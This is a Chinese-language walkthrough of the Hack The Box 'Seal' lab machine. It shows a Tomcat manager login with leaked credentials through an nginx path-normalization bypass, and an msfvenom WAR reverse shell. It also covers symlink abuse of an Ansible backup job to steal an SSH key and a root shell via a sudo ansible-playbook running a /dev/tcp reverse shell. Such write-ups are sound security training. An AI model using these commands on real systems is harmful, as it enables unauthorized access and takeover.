HTB 学习笔记
【Hack The Box】linux练习-- seal
🔥系列专栏:Hack The Box
🎉欢迎关注🔎点赞👍收藏⭐️留言📝
📆首发时间:🌴2022年11月17日🌴
🍭作者水平很有限,如果发现错误,还望告知,感谢!
信息收集
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2
443/tcp open ssl/http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Seal Market
| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 401 Unauthorized
| Date: Sat, 21 Aug 2021 00:59:51 GMT
| Set-Cookie: JSESSIONID=node0gavl59qm2zrx1qhzhowcumpi72.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| GetRequest:
| HTTP/1.1 401 Unauthorized
| Date: Sat, 21 Aug 2021 00:59:50 GMT
| Set-Cookie: JSESSIONID=node0drs9zl7mym6gi9hyziw3t1m90.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Content-Length: 0
| HTTPOptions:
| HTTP/1.1 200 OK
| Date: Sat, 21 Aug 2021 00:59:51 GMT
| Set-Cookie: JSESSIONID=node01q9qys7bogc7sqx9vdtz49od11.node0; Path=/; HttpOnly
| Expires: Thu, 01 Jan 1970 00:00:00 GMT
| Content-Type: text/html;charset=utf-8
| Allow: GET,HEAD,POST,OPTIONS
| Content-Length: 0
| RPCCheck:
| HTTP/1.1 400 Illegal character OTEXT=0x80
| Content-Type: text/html;charset=iso-8859-1
| Content-Length: 71
| Connection: close
| <h1>Bad Message 400</h1><pre>reason: Illegal
commonName=seal.htb
nginx/1.18.0 (Ubuntu)
还有一个8080的代理服务器应该是(http-proxy)
爆破域名
wfuzz -u https://10.10.10.250 -H 'Host: FUZZ.seal.htb' -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt
显然默认大小写chars有 19737 个字符。 我会添加 --hh 19737并重新运行:
结果如下,全是400,
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000689: 400 16 L 122 W 2250 Ch "gc._msdcs"
000009532: 400 14 L 100 W 1949 Ch "#www"
000010581: 400 14 L 100 W 1949 Ch "#mail"
000019834: 400 14 L 100 W 1949 Ch "_domainkey"
443
发现了一个可疑用户名
Jomono
发现一个注册,但没有发现登陆
网站上有两种形式可以接受输入,一种是搜索,另一种是联系我们。
其他地方没有任何功能
两种形式都将所有输入作为 GET 参数粘贴,返回的页面与没有参数的页面完全相同:
GET /?Your+Name=0xdf&Email=0xdf%40seal.htb&Phone+Number=9999&Message=9999 HTTP/1.1
Host: seal.htb
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://seal.htb/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
目录爆破
feroxbuster -u https://seal.htb -k
爆破方法随便,咋样都行
02 0l 0w 0c https://seal.htb/admin
302 0l 0w 0c https://seal.htb/images
302 0l 0w 0c https://seal.htb/css
302 0l 0w 0c https://seal.htb/js
302 0l 0w 0c https://seal.htb/manager
302 0l 0w 0c https://seal.htb/icon
[####################] - 33s 29999/29999 0s found:6 errors:0
[####################] - 32s 29999/29999 918/s https://seal.htb
/manager是 Tomcat 网络服务器的通用路径。 /manager/html是基于 GUI 的管理面板,并且 /manager/text/是基于文本的版本(我在 Tabby 中使用了它)。
有趣的是 feroxbuster没找到 /manager/html/或者 /manager/text/. 当我尝试结帐时 /manager在 Firefox 中,它无法连接:
我将用curl访问这个页面,看看具体信息
curl -k -I https://10.129.95.190/manager
看到他是重定向到了http,而http上只有8080的代理,却没有80的web
目前没办法,又可能内部运行了一个80,但目前没有思路
admin目录也没有东西,显示页面无索引,那我们就接着爆破一下
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
403 7l 10w 162c https://seal.htb/admin/dashboard
403 7l 10w 162c https://seal.htb/admin/dashboards
有两个
啥也没有
8080
gitbucket 的一个实例
没有弱口令,初步检测没有sql注入,有注册页面
我将注册一个账号
随便点开一个能发现使用的tomcat和nginx
点开tomcat有一些配置文件,但是没有包含密码的那个默认配置文件
在一个xml文件找到了账号密码
username="tomcat" password="42MrHBf*z8{Z%"
/manager/html,是403. 我可以尝试基于文本的管理器,但我没有那个角色(会显示 manager-script在 roles).
继续找,还有很多配置信息
代理了一个本地8000
并且本地的 /manager/html被代理掉了,结合实际情况
肯定有一个8000的端口代理了tomcat登陆
所以我们接下来的思路就是要拿到一个shel
tomcat与nginx相互验证混淆
https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf
演示文稿中的示例如下所示:
简单来说 当nginx回隐藏一些常用服务 通过混淆,绕过nginx但是tomcat正确识别的方法 如果我传递一个像这样的 URL :
https://seal.htb/manager;name=rong/html, NGINX 会将其视为完整的 URL,但 Tomcat
会将其视为 https://seal.htb/manager/html. 第一个 URL 不匹配 需要转发的
/manager/html,因此它不会检查相互身份验证。 相反,它将被转发到 Tomcat。 但是 Tomcat 会看到
/manager/html, 并返回该页面。 这是有效的:
我将访问下面的url
https://seal.htb/manager;name=rong/html
并且输入这个凭证
username=tomcat password=42MrHBf*z8{Z%
登陆到了控制面板,在下面的war上传界面可以上传恶意war文件
msfvenom -p java/shell_reverse_tcp lhost=10.10.14.29 lport=443 -f war -o rev.war
而后在首页,单击文件
本地拿到shell
创建稳定shell
script /dev/null -c bash
/opt有个 backups文件夹:
打开一路往下
/opt/backups/archives
这个应该是一处归档文件,可是里面什么都没有
但是我看完喀麦隆这一次进攻之后他就突然出现了两个文件
说明这是计划任务
我先不管,先把刚才另外一个文件夹看完
这 playbook文件夹有一个文件, run.yml:
- hosts: localhost
tasks:
- name: Copy Files
synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes
- name: Server Backups
archive:
path: /opt/backups/files/
dest: "/opt/backups/archives/backup--.gz"
- name: Clean
file:
state: absent
path: /opt/backups/files/
这看起来是每分钟运行的内容。 这是一个 Ansible 包含三个任务
https://www.ansible.com/
Ansible 是一种通用语言,是一个剧本,类似于自动化的做一些动作
三项任务:
“复制文件”获取dashborad/的所有文件并将它们复制到该目录中的/opt/backups/files “Server
Backups”运行 归档 模块生成 .gz带有时间戳的文件。
“清洁”删除 files使用 文件 模块的目录。
Ansible
我们利用这个相当于计划任务的方式是利用软连接
将我们的/home/luis/目录软连接到他执行备份的路径之内
为了利用它,我需要在 Tomcat Web 目录中寻找我可以编写的内容。 找到了 uploads文件夹:
tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ find . -writable
./uploads
我将在上传文件夹中创建指向 luis 主目录的符号链接:
ln -s /home/luis/ /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads/
再备份的时候就可以备份/home/luis/了
tar zxf backup-2022-11-24-10:56:33.gz --force-local
那其实是因为 tar对待 :表示它之前的部分是它应该连接到的主机名。 我可以通过重命名来解决这个问题
或者给它 --force-local。
luis目录下还有一个.ssh
复制到本地而后赋权600
而后登陆ssh
提权
剧本提权
我将写一个剧本而后调用它
rev.yml
- hosts: localhost
tasks:
- name: rev
shell: bash -c 'bash -i >& /dev/tcp/10.10.14.22/443 0>&1'
sudo ansible-playbook rev.yml
1119
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
